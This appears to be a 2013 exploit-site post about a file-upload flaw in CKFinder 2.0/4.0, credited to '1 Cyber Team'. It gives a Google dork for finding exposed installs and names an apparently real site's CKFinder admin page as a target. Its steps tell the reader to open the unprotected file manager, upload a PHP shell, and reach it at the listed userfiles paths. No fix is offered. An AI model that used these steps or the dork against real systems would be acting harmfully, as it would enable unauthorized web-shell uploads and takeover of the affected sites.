CKfinder File Upload Vulnerability

2013-10-22 22:47:51
Posted by: 1 Cyber Team

In The Name Of GOD

[+] Exploit Title:CKfinder File Upload Vulnerability
[+] Date : 2013
[+] Software Link :http://cksource.com/ckfinder
[+] version : 2.0 & 4.0
[+] Security Risk : High
[+] Author : Whit_eagle, E1.Coders
[+] Website : 1cyberteam.com
[+] Dork : inurl:ckfinder/ckfinder.html
[+] Test on : windows
[+] Vendor Homepage: http://tigerbeerus.com/admin/includes/ckfinder/ckfinder.html
---------------------------------------------------------
1.Go to page:

http://target.com/[PATH]/ckfinder/ckfinder.html


2.Uploaded file & Shell on page:

http://target.com/[PATH]/fckimages/files/uploaded file.jpg or .php
http://target.com/[PATH]/userfiles/files/uploaded file.jpg or .php

or right click on oploaded file and select view, copy link in URL
----------------------------------------------------------------------------------------------
Thanks from Mori, Linux Man

Fixes

No fixes

In order to submit a new fix you need to be registered.